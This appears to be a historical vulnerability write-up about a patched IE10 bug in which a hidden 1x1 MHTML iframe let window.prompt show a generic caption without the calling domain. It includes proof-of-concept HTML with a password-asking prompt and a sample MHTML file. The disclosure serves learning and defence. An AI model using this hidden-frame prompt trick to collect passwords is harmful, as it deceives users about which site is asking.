IE10 added a security improvement to window.prompt: the dialog's caption bar always shows the calling domain, replacing the generic "Explorer User Prompt" text that had made the dialog easy to abuse for phishing. I found that calling prompt from inside an MHTML file framed in an iframe reverted to the old generic caption, bypassing the domain attribution entirely.

<!-- The comparison: a direct call from the top-level page shows the calling domain in the caption bar -->
<input value="Show domain" type="button"
  onclick="window.prompt('Enter your password', '')"/>

<!-- Bypass: the same call made through the MHTML iframe's window object (window[0] is the first frame of this page) -->
<input value="DO NOT show domain" type="button"
  onclick="window[0].prompt('Enter your password', '')"/>

<!-- 1x1 frame that loads the MHTML file; its window becomes window[0] -->
<iframe src="dummy.mht" width="1" height="1"></iframe>

The MHTML file is tiny and hidden (1×1 pixels). When the prompt is invoked via window[0].prompt(), that is, on the window of the MHTML iframe, the title bar reads "Explorer User Prompt" instead of the calling domain. The domain in the caption is the only attribution the user gets for a browser-rendered dialog, so with it gone the victim has no indication of which site is asking for the password. Tested on IE10, Windows 8 RTM.
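The post does not include dummy.mht itself. Below is a minimal MHTML (RFC 2557 multipart/related) document of the kind the 1×1 iframe would load, added here as an example and not taken from the original post. The header values and the boundary string are assumptions; the only requirement is a parseable text/html part so that the frame gets a document and therefore a window object for window[0].prompt() to be called on. No Content-Location header is set, since the post does not say whether one was used.

```mhtml
From: <Saved by Windows Internet Explorer 10>
Subject: dummy
MIME-Version: 1.0
Content-Type: multipart/related;
	type="text/html";
	boundary="----=_NextPart_000_0000_01CE0000.00000000"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01CE0000.00000000
Content-Type: text/html;
	charset="utf-8"
Content-Transfer-Encoding: 7bit

<html>
<head><title>dummy</title></head>
<body></body>
</html>

------=_NextPart_000_0000_01CE0000.00000000--
```

Save it with a .mht extension next to the HTML page above so the relative src resolves. Since the bug was fixed long ago, the generic caption only reproduces on an unpatched IE10 build; on a patched browser the caption shows the calling domain in both cases.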

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.